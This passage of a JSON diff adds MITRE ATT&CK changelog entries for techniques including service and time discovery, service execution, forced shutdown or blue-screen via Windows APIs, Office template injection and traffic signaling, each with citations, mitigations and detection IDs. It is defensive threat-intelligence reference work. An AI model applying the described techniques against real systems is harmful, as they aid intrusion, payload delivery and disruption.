+                    "x_mitre_domains": [
+                        "enterprise-attack"
+                    ],
+                    "x_mitre_is_subtechnique": true,
+                    "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "x_mitre_platforms": [
+                        "Windows"
+                    ],
+                    "x_mitre_version": "2.0",
+                    "detailed_diff": "{\"values_changed\": {\"root['modified']\": {\"new_value\": \"2026-05-12 15:12:00.723000+00:00\", \"old_value\": \"2026-04-15 22:42:56.654000+00:00\"}}}",
+                    "previous_version": "2.0",
+                    "changelog_mitigations": {
+                        "shared": [
+                            "M1038: Execution Prevention"
+                        ],
+                        "new": [],
+                        "dropped": []
+                    },
+                    "changelog_datacomponent_detections": {
+                        "shared": [],
+                        "new": [],
+                        "dropped": []
+                    },
+                    "changelog_detectionstrategy_detections": {
+                        "shared": [
+                            "DET0440: Detecting PowerShell Execution via SyncAppvPublishingServer.vbs Proxy Abuse"
+                        ],
+                        "new": [],
+                        "dropped": []
+                    }
+                },
+                {
+                    "type": "attack-pattern",
+                    "id": "attack-pattern--322bad5a-1c49-4d23-ab79-76d641794afa",
+                    "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "created": "2017-05-31 21:30:21.315000+00:00",
+                    "modified": "2026-05-12 15:12:00.624000+00:00",
+                    "name": "System Service Discovery",
+                    "description": "Adversaries may try to gather information about registered local system services. Adversaries may obtain information about services using tools as well as OS utility commands such as <code>sc query</code>, <code>tasklist /svc</code>, <code>systemctl --type=service</code>, and <code>net start</code>. Adversaries may also gather information about schedule tasks via commands such as `schtasks` on Windows or `crontab -l` on Linux and macOS.(Citation: Elastic Security Labs GOSAR 2024)(Citation: SentinelLabs macOS Malware 2021)(Citation: Splunk Linux Gormir 2024)(Citation: Aquasec Kinsing 2020)\n\nAdversaries may use the information from [System Service Discovery](https://attack.mitre.org/techniques/T1007) during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.",
+                    "kill_chain_phases": [
+                        {
+                            "kill_chain_name": "mitre-attack",
+                            "phase_name": "discovery"
+                        }
+                    ],
+                    "revoked": false,
+                    "external_references": [
+                        {
+                            "source_name": "mitre-attack",
+                            "url": "https://attack.mitre.org/techniques/T1007",
+                            "external_id": "T1007"
+                        },
+                        {
+                            "source_name": "Aquasec Kinsing 2020",
+                            "description": "Gal Singer. (2020, April 3). Threat Alert: Kinsing Malware Attacks Targeting Container Environments. Retrieved May 22, 2025.",
+                            "url": "https://www.aquasec.com/blog/threat-alert-kinsing-malware-container-vulnerability/"
+                        },
+                        {
+                            "source_name": "Elastic Security Labs GOSAR 2024",
+                            "description": "Jia Yu Chan, Salim Bitam, Daniel Stepanic, and Seth Goodwin. (2024, December 12). Under the SADBRIDGE with GOSAR: QUASAR Gets a Golang Rewrite. Retrieved May 22, 2025.",
+                            "url": "https://www.elastic.co/security-labs/under-the-sadbridge-with-gosar"
+                        },
+                        {
+                            "source_name": "SentinelLabs macOS Malware 2021",
+                            "description": "Phil Stokes. (2021, February 16). 20 Common Tools & Techniques Used by macOS Threat Actors & Malware. Retrieved May 22, 2025.",
+                            "url": "https://www.sentinelone.com/labs/20-common-tools-techniques-used-by-macos-threat-actors-malware/"
+                        },
+                        {
+                            "source_name": "Splunk Linux Gormir 2024",
+                            "description": "Splunk Threat Research Team , Teoderick Contreras. (2024, July 15). Breaking Down Linux.Gomir: Understanding this Backdoor\u2019s TTPs. Retrieved May 22, 2025.",
+                            "url": "https://www.splunk.com/en_us/blog/security/breaking-down-linux-gomir-understanding-this-backdoors-ttps.html"
+                        }
+                    ],
+                    "object_marking_refs": [
+                        "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+                    ],
+                    "x_mitre_attack_spec_version": "3.3.0",
+                    "x_mitre_contributors": [
+                        "Harshal Tupsamudre, Qualys"
+                    ],
+                    "x_mitre_deprecated": false,
+                    "x_mitre_domains": [
+                        "enterprise-attack"
+                    ],
+                    "x_mitre_is_subtechnique": false,
+                    "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "x_mitre_platforms": [
+                        "Linux",
+                        "macOS",
+                        "Windows"
+                    ],
+                    "x_mitre_version": "1.6",
+                    "detailed_diff": "{\"values_changed\": {\"root['modified']\": {\"new_value\": \"2026-05-12 15:12:00.624000+00:00\", \"old_value\": \"2025-10-24 17:48:36.812000+00:00\"}, \"root['x_mitre_attack_spec_version']\": {\"new_value\": \"3.3.0\", \"old_value\": \"3.2.0\"}}}",
+                    "previous_version": "1.6",
+                    "changelog_mitigations": {
+                        "shared": [],
+                        "new": [],
+                        "dropped": []
+                    },
+                    "changelog_datacomponent_detections": {
+                        "shared": [],
+                        "new": [],
+                        "dropped": []
+                    },
+                    "changelog_detectionstrategy_detections": {
+                        "shared": [
+                            "DET0483: Detection of System Service Discovery Commands Across OS Platforms"
+                        ],
+                        "new": [],
+                        "dropped": []
+                    }
+                },
+                {
+                    "type": "attack-pattern",
+                    "id": "attack-pattern--f1951e8a-500e-4a26-8803-76d95c4554b4",
+                    "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "created": "2020-03-10 18:33:36.159000+00:00",
+                    "modified": "2026-05-12 15:12:00.723000+00:00",
+                    "name": "Service Execution",
+                    "description": "Adversaries may abuse the Windows service control manager to execute malicious commands or payloads. The Windows service control manager (<code>services.exe</code>) is an interface to manage and manipulate services.(Citation: Microsoft Service Control Manager) The service control manager is accessible to users via GUI components as well as system utilities such as <code>sc.exe</code> and [Net](https://attack.mitre.org/software/S0039).\n\n[PsExec](https://attack.mitre.org/software/S0029) can also be used to execute commands or payloads via a temporary Windows service created through the service control manager API.(Citation: Russinovich Sysinternals) Tools such as [PsExec](https://attack.mitre.org/software/S0029) and <code>sc.exe</code> can accept remote servers as arguments and may be used to conduct remote execution.\n\nAdversaries may leverage these mechanisms to execute malicious content. This can be done by either executing a new or modified service. This technique is the execution used in conjunction with [Windows Service](https://attack.mitre.org/techniques/T1543/003) during service persistence or privilege escalation.",
+                    "kill_chain_phases": [
+                        {
+                            "kill_chain_name": "mitre-attack",
+                            "phase_name": "execution"
+                        }
+                    ],
+                    "revoked": false,
+                    "external_references": [
+                        {
+                            "source_name": "mitre-attack",
+                            "url": "https://attack.mitre.org/techniques/T1569/002",
+                            "external_id": "T1569.002"
+                        },
+                        {
+                            "source_name": "Microsoft Service Control Manager",
+                            "description": "Microsoft. (2018, May 31). Service Control Manager. Retrieved March 28, 2020.",
+                            "url": "https://docs.microsoft.com/windows/win32/services/service-control-manager"
+                        },
+                        {
+                            "source_name": "Russinovich Sysinternals",
+                            "description": "Russinovich, M. (2014, May 2). Windows Sysinternals PsExec v2.11. Retrieved May 13, 2015.",
+                            "url": "https://technet.microsoft.com/en-us/sysinternals/bb897553.aspx"
+                        }
+                    ],
+                    "object_marking_refs": [
+                        "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+                    ],
+                    "x_mitre_attack_spec_version": "3.3.0",
+                    "x_mitre_deprecated": false,
+                    "x_mitre_domains": [
+                        "enterprise-attack"
+                    ],
+                    "x_mitre_is_subtechnique": true,
+                    "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "x_mitre_platforms": [
+                        "Windows"
+                    ],
+                    "x_mitre_remote_support": false,
+                    "x_mitre_version": "1.3",
+                    "detailed_diff": "{\"values_changed\": {\"root['modified']\": {\"new_value\": \"2026-05-12 15:12:00.723000+00:00\", \"old_value\": \"2025-10-24 17:49:35.506000+00:00\"}, \"root['x_mitre_attack_spec_version']\": {\"new_value\": \"3.3.0\", \"old_value\": \"3.2.0\"}}}",
+                    "previous_version": "1.3",
+                    "changelog_mitigations": {
+                        "shared": [
+                            "M1022: Restrict File and Directory Permissions",
+                            "M1026: Privileged Account Management",
+                            "M1040: Behavior Prevention on Endpoint"
+                        ],
+                        "new": [],
+                        "dropped": []
+                    },
+                    "changelog_datacomponent_detections": {
+                        "shared": [],
+                        "new": [],
+                        "dropped": []
+                    },
+                    "changelog_detectionstrategy_detections": {
+                        "shared": [
+                            "DET0421: Detection Strategy for System Services Service Execution"
+                        ],
+                        "new": [],
+                        "dropped": []
+                    }
+                },
+                {
+                    "type": "attack-pattern",
+                    "id": "attack-pattern--ff73aa03-0090-4464-83ac-f89e233c02bc",
+                    "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "created": "2019-10-04 20:42:28.541000+00:00",
+                    "modified": "2026-05-12 15:12:00.726000+00:00",
+                    "name": "System Shutdown/Reboot",
+                    "description": "Adversaries may shutdown/reboot systems to interrupt access to, or aid in the destruction of, those systems. Operating systems may contain commands to initiate a shutdown/reboot of a machine or network device. In some cases, these commands may also be used to initiate a shutdown/reboot of a remote computer or network device via [Network Device CLI](https://attack.mitre.org/techniques/T1059/008) (e.g. <code>reload</code>).(Citation: Microsoft Shutdown Oct 2017)(Citation: alert_TA18_106A) They may also include shutdown/reboot of a virtual machine via hypervisor / cloud consoles or command line tools.\n\nShutting down or rebooting systems may disrupt access to computer resources for legitimate users while also impeding incident response/recovery.\n\nAdversaries may also use Windows API functions, such as `InitializeSystemShutdownExW` or `ExitWindowsEx`, to force a system to shut down or reboot.(Citation: CrowdStrike Blog)(Citation: Unit42 Agrius 2023) Alternatively, the `NtRaiseHardError`or `ZwRaiseHardError` Windows API functions with the `ResponseOption` parameter set to `OptionShutdownSystem` may deliver a \u201cblue screen of death\u201d (BSOD) to a system.(Citation: SonicWall)(Citation: NtRaiseHardError)(Citation: NotMe-BSOD) In order to leverage these API functions, an adversary may need to acquire `SeShutdownPrivilege` (e.g., via [Access Token Manipulation](https://attack.mitre.org/techniques/T1134)).(Citation: Unit42 Agrius 2023)\n In some cases, the system may not be able to boot again. \n\nAdversaries may attempt to shutdown/reboot a system after impacting it in other ways, such as [Disk Structure Wipe](https://attack.mitre.org/techniques/T1561/002) or [Inhibit System Recovery](https://attack.mitre.org/techniques/T1490), to hasten the intended effects on system availability.(Citation: Talos Nyetya June 2017)(Citation: Talos Olympic Destroyer 2018)",
+                    "kill_chain_phases": [
+                        {
+                            "kill_chain_name": "mitre-attack",
+                            "phase_name": "impact"
+                        }
+                    ],
+                    "revoked": false,
+                    "external_references": [
+                        {
+                            "source_name": "mitre-attack",
+                            "url": "https://attack.mitre.org/techniques/T1529",
+                            "external_id": "T1529"
+                        },
+                        {
+                            "source_name": "Talos Nyetya June 2017",
+                            "description": "Chiu, A. (2016, June 27). New Ransomware Variant \"Nyetya\" Compromises Systems Worldwide. Retrieved March 26, 2019.",
+                            "url": "https://blog.talosintelligence.com/2017/06/worldwide-ransomware-variant.html"
+                        },
+                        {
+                            "source_name": "alert_TA18_106A",
+                            "description": "CISA. (2018, April 20). Russian State-Sponsored Cyber Actors Targeting Network Infrastructure Devices. Retrieved February 14, 2022.",
+                            "url": "https://www.cisa.gov/uscert/ncas/alerts/TA18-106A"
+                        },
+                        {
+                            "source_name": "NotMe-BSOD",
+                            "description": "lzcapp. (n.d.). Retrieved September 22, 2025.",
+                            "url": "https://github.com/lzcapp/NotMe-BSOD"
+                        },
+                        {
+                            "source_name": "Talos Olympic Destroyer 2018",
+                            "description": "Mercer, W. and Rascagneres, P. (2018, February 12). Olympic Destroyer Takes Aim At Winter Olympics. Retrieved March 14, 2019.",
+                            "url": "https://blog.talosintelligence.com/2018/02/olympic-destroyer.html"
+                        },
+                        {
+                            "source_name": "Microsoft Shutdown Oct 2017",
+                            "description": "Microsoft. (2017, October 15). Shutdown. Retrieved October 4, 2019.",
+                            "url": "https://docs.microsoft.com/en-us/windows-server/administration/windows-commands/shutdown"
+                        },
+                        {
+                            "source_name": "NtRaiseHardError",
+                            "description": "NtDoc. (n.d.). NtRaiseHardError - NtDoc. Retrieved September 22, 2025.",
+                            "url": "https://ntdoc.m417z.com/ntraiseharderror"
+                        },
+                        {
+                            "source_name": "Unit42 Agrius 2023",
+                            "description": "Or Chechik, Tom Fakterman, Daniel Frank & Assaf Dahan. (2023, November 6). Agonizing Serpens (Aka Agrius) Targeting the Israeli Higher Education and Tech Sectors. Retrieved May 22, 2024.",
+                            "url": "https://unit42.paloaltonetworks.com/agonizing-serpens-targets-israeli-tech-higher-ed-sectors/"
+                        },
+                        {
+                            "source_name": "SonicWall",
+                            "description": "SecurityNews. (2024, July 12). Disarming DarkGate: A Deep Dive into Thwarting the Latest DarkGate Variant. Retrieved September 22, 2025.",
+                            "url": "https://www.sonicwall.com/blog/disarming-darkgate-a-deep-dive-into-thwarting-the-latest-darkgate-variant"
+                        },
+                        {
+                            "source_name": "CrowdStrike Blog",
+                            "description": "William Thomas, Adrian Liviu Arsene, Farid Hendi. (2022, February 25). CrowdStrike Falcon\u00ae Protects from New Wiper Malware Used in Ukraine Cyberattacks. Retrieved September 22, 2025.",
+                            "url": "https://www.crowdstrike.com/en-us/blog/how-crowdstrike-falcon-protects-against-wiper-malware-used-in-ukraine-attacks/"
+                        }
+                    ],
+                    "object_marking_refs": [
+                        "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+                    ],
+                    "x_mitre_attack_spec_version": "3.3.0",
+                    "x_mitre_contributors": [
+                        "Austin Clark, @c2defense",
+                        "Hubert Mank",
+                        "Janantha Marasinghe"
+                    ],
+                    "x_mitre_deprecated": false,
+                    "x_mitre_domains": [
+                        "enterprise-attack"
+                    ],
+                    "x_mitre_impact_type": [
+                        "Availability"
+                    ],
+                    "x_mitre_is_subtechnique": false,
+                    "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "x_mitre_platforms": [
+                        "ESXi",
+                        "Linux",
+                        "macOS",
+                        "Network Devices",
+                        "Windows"
+                    ],
+                    "x_mitre_version": "1.5",
+                    "detailed_diff": "{\"values_changed\": {\"root['modified']\": {\"new_value\": \"2026-05-12 15:12:00.726000+00:00\", \"old_value\": \"2025-10-24 17:49:40.145000+00:00\"}}}",
+                    "previous_version": "1.5",
+                    "changelog_mitigations": {
+                        "shared": [],
+                        "new": [],
+                        "dropped": []
+                    },
+                    "changelog_datacomponent_detections": {
+                        "shared": [],
+                        "new": [],
+                        "dropped": []
+                    },
+                    "changelog_detectionstrategy_detections": {
+                        "shared": [
+                            "DET0559: Multi-Platform Shutdown or Reboot Detection via Execution and Host Status Events"
+                        ],
+                        "new": [],
+                        "dropped": []
+                    }
+                },
+                {
+                    "type": "attack-pattern",
+                    "id": "attack-pattern--f3c544dc-673c-4ef3-accb-53229f1ae077",
+                    "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "created": "2017-05-31 21:31:37.450000+00:00",
+                    "modified": "2026-05-12 15:12:00.724000+00:00",
+                    "name": "System Time Discovery",
+                    "description": "An adversary may gather the system time and/or time zone settings from a local or remote system. The system time is set and stored by services, such as the Windows Time Service on Windows or <code>systemsetup</code> on macOS.(Citation: MSDN System Time)(Citation: Technet Windows Time Service)(Citation: systemsetup mac time) These time settings may also be synchronized between systems and services in an enterprise network, typically accomplished with a network time server within a domain.(Citation: Mac Time Sync)(Citation: linux system time)\n\nSystem time information may be gathered in a number of ways, such as with [Net](https://attack.mitre.org/software/S0039) on Windows by performing <code>net time \\\\hostname</code> to gather the system time on a remote system. The victim's time zone may also be inferred from the current system time or gathered by using <code>w32tm /tz</code>.(Citation: Technet Windows Time Service) In addition, adversaries can discover device uptime through functions such as <code>GetTickCount()</code> to determine how long it has been since the system booted up.(Citation: Virtualization/Sandbox Evasion)\n\nOn network devices, [Network Device CLI](https://attack.mitre.org/techniques/T1059/008) commands such as `show clock detail` can be used to see the current time configuration.(Citation: show_clock_detail_cisco_cmd) On ESXi servers, `esxcli system clock get` can be used for the same purpose.\n\nIn addition, system calls \u2013 such as <code>time()</code> \u2013 have been used to collect the current time on Linux devices.(Citation: MAGNET GOBLIN) On macOS systems, adversaries may use commands such as <code>systemsetup -gettimezone</code> or <code>timeIntervalSinceNow</code> to gather current time zone information or current date and time.(Citation: System Information Discovery Technique)(Citation: ESET DazzleSpy Jan 2022)\n\nThis information could be useful for performing other techniques, such as executing a file with a [Scheduled Task/Job](https://attack.mitre.org/techniques/T1053)(Citation: RSA EU12 They're Inside), or to discover locality information based on time zone to assist in victim targeting (i.e. [System Location Discovery](https://attack.mitre.org/techniques/T1614)). Adversaries may also use knowledge of system time as part of a time bomb, or delaying execution until a specified date/time.(Citation: AnyRun TimeBomb)",
+                    "kill_chain_phases": [
+                        {
+                            "kill_chain_name": "mitre-attack",
+                            "phase_name": "discovery"
+                        }
+                    ],
+                    "revoked": false,
+                    "external_references": [
+                        {
+                            "source_name": "mitre-attack",
+                            "url": "https://attack.mitre.org/techniques/T1124",
+                            "external_id": "T1124"
+                        },
+                        {
+                            "source_name": "systemsetup mac time",
+                            "description": "Apple Support. (n.d.). About systemsetup in Remote Desktop. Retrieved March 27, 2024.",
+                            "url": "https://support.apple.com/en-gb/guide/remote-desktop/apd95406b8d/mac"
+                        },
+                        {
+                            "source_name": "linux system time",
+                            "description": "ArchLinux. (2024, February 1). System Time. Retrieved March 27, 2024.",
+                            "url": "https://wiki.archlinux.org/title/System_time"
+                        },
+                        {
+                            "source_name": "MAGNET GOBLIN",
+                            "description": "Check Point Research. (2024, March 8). MAGNET GOBLIN TARGETS PUBLICLY FACING SERVERS USING 1-DAY VULNERABILITIES. Retrieved March 27, 2024.",
+                            "url": "https://research.checkpoint.com/2024/magnet-goblin-targets-publicly-facing-servers-using-1-day-vulnerabilities/"
+                        },
+                        {
+                            "source_name": "show_clock_detail_cisco_cmd",
+                            "description": "Cisco. (2023, March 6). show clock detail - Cisco IOS Security Command Reference: Commands S to Z . Retrieved July 13, 2022.",
+                            "url": "https://www.cisco.com/c/en/us/td/docs/ios-xml/ios/security/s1/sec-s1-cr-book/sec-cr-s2.html#wp1896741674"
+                        },
+                        {
+                            "source_name": "Mac Time Sync",
+                            "description": "Cone, Matt. (2021, January 14). Synchronize your Mac's Clock with a Time Server. Retrieved March 27, 2024.",
+                            "url": "https://www.macinstruct.com/tutorials/synchronize-your-macs-clock-with-a-time-server/"
+                        },
+                        {
+                            "source_name": "ESET DazzleSpy Jan 2022",
+                            "description": "M.L\u00e9veill\u00e9, M., Cherepanov, A.. (2022, January 25). Watering hole deploys new macOS malware, DazzleSpy, in Asia. Retrieved May 6, 2022.",
+                            "url": "https://www.welivesecurity.com/2022/01/25/watering-hole-deploys-new-macos-malware-dazzlespy-asia/"
+                        },
+                        {
+                            "source_name": "AnyRun TimeBomb",
+                            "description": "Malicious History. (2020, September 17). Time Bombs: Malware With Delayed Execution. Retrieved April 22, 2021.",
+                            "url": "https://any.run/cybersecurity-blog/time-bombs-malware-with-delayed-execution/"
+                        },
+                        {
+                            "source_name": "Technet Windows Time Service",
+                            "description": "Mathers, B. (2016, September 30). Windows Time Service Tools and Settings. Retrieved November 25, 2016.",
+                            "url": "https://technet.microsoft.com/windows-server-docs/identity/ad-ds/get-started/windows-time-service/windows-time-service-tools-and-settings"
+                        },
+                        {
+                            "source_name": "MSDN System Time",
+                            "description": "Microsoft. (n.d.). System Time. Retrieved November 25, 2016.",
+                            "url": "https://msdn.microsoft.com/ms724961.aspx"
+                        },
+                        {
+                            "source_name": "RSA EU12 They're Inside",
+                            "description": "Rivner, U., Schwartz, E. (2012). They\u2019re Inside\u2026 Now What?. Retrieved November 25, 2016.",
+                            "url": "https://www.rsaconference.com/writable/presentations/file_upload/ht-209_rivner_schwartz.pdf"
+                        },
+                        {
+                            "source_name": "System Information Discovery Technique",
+                            "description": "YUCEEL, Huseyin Can. Picus Labs. (2022, June 9). The System Information Discovery Technique Explained - MITRE ATT&CK T1082. Retrieved March 27, 2024.",
+                            "url": "https://www.picussecurity.com/resource/the-system-information-discovery-technique-explained-mitre-attack-t1082"
+                        },
+                        {
+                            "source_name": "Virtualization/Sandbox Evasion",
+                            "description": "YUCEEL, Huseyin Can. Picus Labs. (2022, June 9). Virtualization/Sandbox Evasion - How Attackers Avoid Malware Analysis. Retrieved December 26, 2023.",
+                            "url": "https://www.picussecurity.com/resource/virtualization/sandbox-evasion-how-attackers-avoid-malware-analysis"
+                        }
+                    ],
+                    "object_marking_refs": [
+                        "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+                    ],
+                    "x_mitre_attack_spec_version": "3.3.0",
+                    "x_mitre_contributors": [
+                        "FIRST.ORG's Cyber Threat Intelligence SIG",
+                        "Austin Clark, @c2defense"
+                    ],
+                    "x_mitre_deprecated": false,
+                    "x_mitre_domains": [
+                        "enterprise-attack"
+                    ],
+                    "x_mitre_is_subtechnique": false,
+                    "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "x_mitre_platforms": [
+                        "ESXi",
+                        "Linux",
+                        "macOS",
+                        "Network Devices",
+                        "Windows"
+                    ],
+                    "x_mitre_version": "1.5",
+                    "detailed_diff": "{\"values_changed\": {\"root['modified']\": {\"new_value\": \"2026-05-12 15:12:00.724000+00:00\", \"old_value\": \"2025-10-24 17:49:36.399000+00:00\"}, \"root['x_mitre_attack_spec_version']\": {\"new_value\": \"3.3.0\", \"old_value\": \"3.2.0\"}}}",
+                    "previous_version": "1.5",
+                    "changelog_mitigations": {
+                        "shared": [],
+                        "new": [],
+                        "dropped": []
+                    },
+                    "changelog_datacomponent_detections": {
+                        "shared": [],
+                        "new": [],
+                        "dropped": []
+                    },
+                    "changelog_detectionstrategy_detections": {
+                        "shared": [
+                            "DET0151: Behavior-chain, platform-aware detection strategy for T1124 System Time Discovery"
+                        ],
+                        "new": [],
+                        "dropped": []
+                    }
+                },
+                {
+                    "type": "attack-pattern",
+                    "id": "attack-pattern--dc31fe1e-d722-49da-8f5f-92c7b5aff534",
+                    "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "created": "2018-10-17 00:14:20.652000+00:00",
+                    "modified": "2026-05-12 15:12:00.722000+00:00",
+                    "name": "Template Injection",
+                    "description": "Adversaries may create or modify references in user document templates to conceal malicious code or force authentication attempts. For example, Microsoft\u2019s Office Open XML (OOXML) specification defines an XML-based format for Office documents (.docx, xlsx, .pptx) to replace older binary formats (.doc, .xls, .ppt). OOXML files are packed together ZIP archives compromised of various XML files, referred to as parts, containing properties that collectively define how a document is rendered.(Citation: Microsoft Open XML July 2017)\n\nProperties within parts may reference shared public resources accessed via online URLs. For example, template properties may reference a file, serving as a pre-formatted document blueprint, that is fetched when the document is loaded.\n\nAdversaries may abuse these templates to initially conceal malicious code to be executed via user documents. Template references injected into a document may enable malicious payloads to be fetched and executed when the document is loaded.(Citation: SANS Brian Wiltse Template Injection) These documents can be delivered via other techniques such as [Phishing](https://attack.mitre.org/techniques/T1566) and/or [Taint Shared Content](https://attack.mitre.org/techniques/T1080) and may evade static detections since no typical indicators (VBA macro, script, etc.) are present until after the malicious payload is fetched.(Citation: Redxorblue Remote Template Injection) Examples have been seen in the wild where template injection was used to load malicious code containing an exploit.(Citation: MalwareBytes Template Injection OCT 2017)\n\nAdversaries may also modify the <code>*\\template</code> control word within an .rtf file to similarly conceal then download malicious code. This legitimate control word value is intended to be a file destination of a template file resource that is retrieved and loaded when an .rtf file is opened. However, adversaries may alter the bytes of an existing .rtf file to insert a template control word field to include a URL resource of a malicious payload.(Citation: Proofpoint RTF Injection)(Citation: Ciberseguridad Decoding malicious RTF files)\n\nThis technique may also enable [Forced Authentication](https://attack.mitre.org/techniques/T1187) by injecting a SMB/HTTPS (or other credential prompting) URL and triggering an authentication attempt.(Citation: Anomali Template Injection MAR 2018)(Citation: Talos Template Injection July 2017)(Citation: ryhanson phishery SEPT 2016)",
+                    "kill_chain_phases": [
+                        {
+                            "kill_chain_name": "mitre-attack",
+                            "phase_name": "stealth"
+                        }
+                    ],
+                    "revoked": false,
+                    "external_references": [
+                        {
+                            "source_name": "mitre-attack",
+                            "url": "https://attack.mitre.org/techniques/T1221",
+                            "external_id": "T1221"
+                        },
+                        {
+                            "source_name": "Talos Template Injection July 2017",
+                            "description": "Baird, S. et al.. (2017, July 7). Attack on Critical Infrastructure Leverages Template Injection. Retrieved July 21, 2018.",
+                            "url": "https://blog.talosintelligence.com/2017/07/template-injection.html"
+                        },
+                        {
+                            "source_name": "ryhanson phishery SEPT 2016",
+                            "description": "Hanson, R. (2016, September 24). phishery. Retrieved July 21, 2018.",
+                            "url": "https://github.com/ryhanson/phishery"
+                        },
+                        {
+                            "source_name": "Redxorblue Remote Template Injection",
+                            "description": "Hawkins, J. (2018, July 18). Executing Macros From a DOCX With Remote Template Injection. Retrieved October 12, 2018.",
+                            "url": "http://blog.redxorblue.com/2018/07/executing-macros-from-docx-with-remote.html"
+                        },
+                        {
+                            "source_name": "Anomali Template Injection MAR 2018",
+                            "description": "Intel_Acquisition_Team. (2018, March 1). Credential Harvesting and Malicious File Delivery using Microsoft Office Template Injection. Retrieved July 20, 2018.",
+                            "url": "https://forum.anomali.com/t/credential-harvesting-and-malicious-file-delivery-using-microsoft-office-template-injection/2104"
+                        },
+                        {
+                            "source_name": "Microsoft Open XML July 2017",
+                            "description": "Microsoft. (2014, July 9). Introducing the Office (2007) Open XML File Formats. Retrieved July 20, 2018.",
+                            "url": "https://docs.microsoft.com/previous-versions/office/developer/office-2007/aa338205(v=office.12)"
+                        },
+                        {
+                            "source_name": "Ciberseguridad Decoding malicious RTF files",
+                            "description": "Pedrero, R.. (2021, July). Decoding malicious RTF files. Retrieved November 16, 2021.",
+                            "url": "https://ciberseguridad.blog/decodificando-ficheros-rtf-maliciosos/"
+                        },
+                        {
+                            "source_name": "Proofpoint RTF Injection",
+                            "description": "Raggi, M. (2021, December 1). Injection is the New Black: Novel RTF Template Inject Technique Poised for Widespread Adoption\u202fBeyond APT Actors\u202f. Retrieved December 9, 2021.",
+                            "url": "https://www.proofpoint.com/us/blog/threat-insight/injection-new-black-novel-rtf-template-inject-technique-poised-widespread"
+                        },
+                        {
+                            "source_name": "MalwareBytes Template Injection OCT 2017",
+                            "description": "Segura, J. (2017, October 13). Decoy Microsoft Word document delivers malware through a RAT. Retrieved July 21, 2018.",
+                            "url": "https://blog.malwarebytes.com/threat-analysis/2017/10/decoy-microsoft-word-document-delivers-malware-through-rat/"
+                        },
+                        {
+                            "source_name": "SANS Brian Wiltse Template Injection",
+                            "description": "Wiltse, B.. (2018, November 7). Template Injection Attacks - Bypassing Security Controls by Living off the Land. Retrieved April 10, 2019.",
+                            "url": "https://www.sans.org/reading-room/whitepapers/testing/template-injection-attacks-bypassing-security-controls-living-land-38780"
+                        }
+                    ],
+                    "object_marking_refs": [
+                        "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+                    ],
+                    "x_mitre_attack_spec_version": "3.3.0",
+                    "x_mitre_contributors": [
+                        "Brian Wiltse @evalstrings",
+                        "Michael Raggi @aRtAGGI",
+                        "Patrick Campbell, @pjcampbe11"
+                    ],
+                    "x_mitre_deprecated": false,
+                    "x_mitre_domains": [
+                        "enterprise-attack"
+                    ],
+                    "x_mitre_is_subtechnique": false,
+                    "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "x_mitre_platforms": [
+                        "Windows"
+                    ],
+                    "x_mitre_version": "2.0",
+                    "detailed_diff": "{\"values_changed\": {\"root['modified']\": {\"new_value\": \"2026-05-12 15:12:00.722000+00:00\", \"old_value\": \"2026-04-15 22:44:24.229000+00:00\"}}}",
+                    "previous_version": "2.0",
+                    "changelog_mitigations": {
+                        "shared": [
+                            "M1017: User Training",
+                            "M1031: Network Intrusion Prevention",
+                            "M1042: Disable or Remove Feature or Program",
+                            "M1049: Antivirus/Antimalware"
+                        ],
+                        "new": [],
+                        "dropped": []
+                    },
+                    "changelog_datacomponent_detections": {
+                        "shared": [],
+                        "new": [],
+                        "dropped": []
+                    },
+                    "changelog_detectionstrategy_detections": {
+                        "shared": [
+                            "DET0566: Template Injection Detection - Windows"
+                        ],
+                        "new": [],
+                        "dropped": []
+                    }
+                },
+                {
+                    "type": "attack-pattern",
+                    "id": "attack-pattern--451a9977-d255-43c9-b431-66de80130c8c",
+                    "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "created": "2018-04-18 17:59:24.739000+00:00",
+                    "modified": "2026-05-12 15:12:00.629000+00:00",
+                    "name": "Traffic Signaling",
+                    "description": "Adversaries may use traffic signaling to hide open ports or other malicious functionality used for persistence or command and control. Traffic signaling involves the use of a magic value or sequence that must be sent to a system to trigger a special response, such as opening a closed port or executing a malicious task. This may take the form of sending a series of packets with certain characteristics before a port will be opened that the adversary can use for command and control. Usually this series of packets consists of attempted connections to a predefined sequence of closed ports (i.e. [Port Knocking](https://attack.mitre.org/techniques/T1205/001)), but can involve unusual flags, specific strings, or other unique characteristics. After the sequence is completed, opening a port may be accomplished by the host-based firewall, but could also be implemented by custom software.\n\nAdversaries may also communicate with an already open port, but the service listening on that port will only respond to commands or trigger other malicious functionality if passed the appropriate magic value(s).\n\nThe observation of the signal packets to trigger the communication can be conducted through different methods. One means, originally implemented by Cd00r (Citation: Hartrell cd00r 2002), is to use the libpcap libraries to sniff for the packets in question. Another method leverages raw sockets, which enables the malware to use ports that are already open for use by other programs.\n\nOn network devices, adversaries may use crafted packets to enable [Network Device Authentication](https://attack.mitre.org/techniques/T1556/004) for standard services offered by the device such as telnet.  Such signaling may also be used to open a closed service port such as telnet, or to trigger module modification of malware implants on the device, adding, removing, or changing malicious capabilities.  Adversaries may use crafted packets to attempt to connect to one or more (open or closed) ports, but may also attempt to connect to a router 